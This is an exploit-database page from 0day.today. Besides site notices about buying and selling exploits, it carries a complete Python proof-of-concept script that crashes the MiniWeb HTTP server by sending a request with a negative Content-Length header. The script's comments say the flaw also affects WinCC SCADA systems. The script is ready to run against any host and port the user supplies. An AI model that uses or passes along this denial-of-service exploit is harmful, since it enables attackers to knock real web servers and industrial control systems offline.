0day.today - Biggest Exploit Database in the World.
Things you should know about 0day.today:
Administration of this site uses the official contacts. Beware of impostors!
- We use one main domain: http://0day.today
- Most of the materials is completely FREE
- If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earn GOLD
Administration of this site uses the official contacts. Beware of impostors!
We DO NOT use Telegram or any messengers / social networks!
Please, beware of scammers!
Please, beware of scammers!
- Read the [ agreement ]
- Read the [ Submit ] rules
- Visit the [ faq ] page
- [ Register ] profile
- Get [ GOLD ]
- If you want to [ sell ]
- If you want to [ buy ]
- If you lost [ Account ]
- Any questions [ admin@0day.today ]
- Authorisation page
- Registration page
- Restore account page
- FAQ page
- Contacts page
- Publishing rules
- Agreement page
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
You can contact us by:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
MiniWeb Content-Length Denial Of Service
#!/usr/bin/env python # miniweb Content-Length DoS PoC # Not a 0day, sadly. # aluigi found this ages back, I independantly rediscovered it fuzzing # and noticed it was still unpatched. Oh well, better disclose so! # vuln version at code.google.com/p/miniweb/ # affects WinCC also :) (Oh, them SCADA...) # Massive props to ohdae for helping with this! # insecurety.net | bindshell.it.cx import sys import socket def banner(): print """ MiniWeb Killer - Kills MiniWeb -Insecurety Research -Bindshell Labs """ if len(sys.argv) != 3: banner() print "Usage: ./MiniDoS.py <host> <port>" sys.exit(1) banner() target = sys.argv[1] port = sys.argv[2] evil = "POST / HTTP/1.1\r\n" evil += "Host: %s\r\n" %(target) evil += "User-Agent: MiniWeb Killer ^-^\r\n" evil += "Content-Length: -10 \r\n\r\n" # part that kills the box expl = socket.socket ( socket.AF_INET, socket.SOCK_STREAM ) try: expl.connect((target, int(port))) print "[+] Connected, firing das payload!" except: print "[-] Connection Failed... Is there even a target?" sys.exit(1) try: expl.send(evil) print "[+] Payload Sent!" except: print "[-] Payload Sending Failure... WTF?" sys.exit(1) expl.close() print "[*] Should be dead..." # 0day.today [2024-12-25] #